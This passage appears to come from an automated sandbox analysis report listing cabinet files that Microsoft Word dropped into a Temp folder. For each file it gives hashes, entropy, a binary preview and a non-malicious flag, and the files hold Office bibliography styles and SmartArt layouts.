                                    Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                    C:\Users\user\AppData\Local\Temp\cab9ABE.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):32833
                                    Entropy (8bit):7.825460303519308
                                    Encrypted:false
                                    SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                    MD5:205AF51604EF96EF1E8E60212541F742
                                    SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                    SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                    SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                    Malicious:false
                                    Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                    C:\Users\user\AppData\Local\Temp\cab9ABF.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31482
                                    Entropy (8bit):7.808057272318224
                                    Encrypted:false
                                    SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                    MD5:F10DF902980F1D5BEEA96B2C668408A7
                                    SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                    SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                    SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                    Malicious:false
                                    Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                    C:\Users\user\AppData\Local\Temp\cab9AC0.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31835
                                    Entropy (8bit):7.81952379746457
                                    Encrypted:false
                                    SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                    MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                    SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                    SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                    SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                    Malicious:false
                                    Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                    C:\Users\user\AppData\Local\Temp\cab9AD4.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):34816
                                    Entropy (8bit):7.840826397575377
                                    Encrypted:false
                                    SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                    MD5:62863124CDCDA135ECC0E722782CB888
                                    SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                    SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                    SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                    Malicious:false
                                    Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                    C:\Users\user\AppData\Local\Temp\cab9AD5.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):19288
                                    Entropy (8bit):7.570850633867256
                                    Encrypted:false
                                    SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                    MD5:B9A6FF715719EE9DE16421AB983CA745
                                    SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                    SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                    SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                    Malicious:false
                                    Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                    C:\Users\user\AppData\Local\Temp\cab9B17.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20235
                                    Entropy (8bit):7.61176626859621
                                    Encrypted:false
                                    SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                    MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                    SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                    SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                    SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                    Malicious:false
                                    Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                    C:\Users\user\AppData\Local\Temp\cab9B18.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):26944
                                    Entropy (8bit):7.7574645319832225
                                    Encrypted:false
                                    SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                    MD5:F913DD84915753042D856CEC4E5DABA5
                                    SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                    SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                    SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                    Malicious:false
                                    Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                    C:\Users\user\AppData\Local\Temp\cab9B19.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):25314
                                    Entropy (8bit):7.729848360340861
                                    Encrypted:false
                                    SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                    MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                    SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                    SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                    SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                    Malicious:false
                                    Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                    C:\Users\user\AppData\Local\Temp\cab9B1A.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):19893
                                    Entropy (8bit):7.592090622603185
                                    Encrypted:false
                                    SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                    MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                    SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                    SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                    SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                    Malicious:false
                                    Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                    C:\Users\user\AppData\Local\Temp\cab9B1B.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21357
                                    Entropy (8bit):7.641082043198371
                                    Encrypted:false
                                    SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                    MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                    SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                    SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                    SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                    Malicious:false
                                    Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                    C:\Users\user\AppData\Local\Temp\cab9B1C.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22340
                                    Entropy (8bit):7.668619892503165
                                    Encrypted:false
                                    SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                    MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                    SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                    SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                    SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                    Malicious:false
                                    Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                    C:\Users\user\AppData\Local\Temp\cab9B1D.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22008
                                    Entropy (8bit):7.662386258803613
                                    Encrypted:false
                                    SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                    MD5:ABBF10CEE9480E41D81277E9538F98CB
                                    SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                    SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                    SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                    Malicious:false
                                    Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                    C:\Users\user\AppData\Local\Temp\cab9B2E.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):23597
                                    Entropy (8bit):7.692965575678876
                                    Encrypted:false
                                    SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                    MD5:7C645EC505982FE529D0E5035B378FFC
                                    SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                    SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                    SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                    Malicious:false
